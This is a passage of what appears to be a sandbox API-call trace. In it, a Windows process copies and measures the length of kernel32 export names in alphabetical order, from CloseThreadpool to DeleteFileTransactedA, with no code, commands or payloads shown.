[0086.345] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.345] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.345] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.346] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.346] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.346] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.346] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.346] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.346] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.346] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.346] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.346] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.346] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.346] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.346] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.346] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.346] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.346] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.346] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.346] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.347] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.347] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.347] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.347] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.347] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.347] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.347] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.347] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.347] lstrlenA (lpString="COPYFILEA") returned 9 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.347] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.347] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.347] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.347] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.347] lstrlenA (lpString="COPYFILEW") returned 9 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.347] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.347] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.347] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.347] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.348] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.348] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.348] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.348] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.348] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.348] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.348] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.348] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.348] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.348] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.348] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.348] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.348] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.348] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.348] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.348] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.348] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.348] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.349] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.349] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.349] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.349] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.349] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.349] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.349] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.349] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.349] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.349] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.349] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.349] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.349] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.349] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.349] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.349] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.349] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.349] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.350] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.350] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.350] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.350] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.350] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.350] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.350] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.350] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.350] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.350] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.350] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.350] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.350] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.350] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.350] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.350] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.350] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.350] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.351] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.351] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.351] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.351] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.351] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.351] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.351] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.351] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.351] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.351] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.351] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.351] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.351] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.351] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.351] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.351] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.351] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.351] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.352] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.352] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.352] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.352] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.352] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.352] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.352] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.352] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.352] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.352] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.352] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.352] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.352] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.352] lstrlenA (lpString="DELETEATOM") returned 10 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.352] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.352] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.352] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.352] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.353] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.353] lstrlenA 